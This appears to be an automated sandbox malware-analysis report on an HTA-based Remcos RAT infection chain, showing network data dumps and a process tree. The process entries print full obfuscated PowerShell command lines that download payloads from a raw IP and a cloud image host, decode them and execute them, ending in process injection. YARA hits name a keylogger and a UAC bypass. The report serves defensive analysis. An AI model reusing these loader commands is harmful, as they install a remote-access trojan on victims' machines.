                                                                                                                                                            2024-12-13 06:38:39 UTC1369INData Raw: 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44 69 33 51 34
                                                                                                                                                            Data Ascii: cpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeDi3Q4
                                                                                                                                                            2024-12-13 06:38:39 UTC1369INData Raw: 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41 41 51 48 41
                                                                                                                                                            Data Ascii: 8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAAAQHA
                                                                                                                                                            2024-12-13 06:38:39 UTC1369INData Raw: 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35 51 64 4f 47
                                                                                                                                                            Data Ascii: jLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45QdOG
                                                                                                                                                            2024-12-13 06:38:39 UTC1369INData Raw: 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44 67 50 7a 34
                                                                                                                                                            Data Ascii: 6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4
                                                                                                                                                            2024-12-13 06:38:39 UTC1337INData Raw: 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44
                                                                                                                                                            Data Ascii: w0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6D


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:01:38:05
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta"
                                                                                                                                                            Imagebase:0x910000
                                                                                                                                                            File size:13'312 bytes
                                                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:01:38:06
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:01:38:06
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:01:38:06
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                                                                                                                                                            Imagebase:0x880000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:01:38:09
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline"
                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                            File size:2'141'552 bytes
                                                                                                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:01:38:09
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\1wf2prhw\CSCC38D34038713434CB5EBD437745683DE.TMP"
                                                                                                                                                            Imagebase:0x810000
                                                                                                                                                            File size:46'832 bytes
                                                                                                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:01:38:14
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
                                                                                                                                                            Imagebase:0x6e0000
                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:01:38:15
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                                                                                                                                                            Imagebase:0x880000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:01:38:15
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:01:38:40
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                            Imagebase:0x10000
                                                                                                                                                            File size:108'664 bytes
                                                                                                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4186207219.000000000244F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:01:38:45
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aacvjnbswp"
                                                                                                                                                            Imagebase:0xbc0000
                                                                                                                                                            File size:108'664 bytes
                                                                                                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:01:38:45
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"
                                                                                                                                                            Imagebase:0x1e0000
                                                                                                                                                            File size:108'664 bytes
                                                                                                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:01:38:45
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            Wow64 process (32bit):true
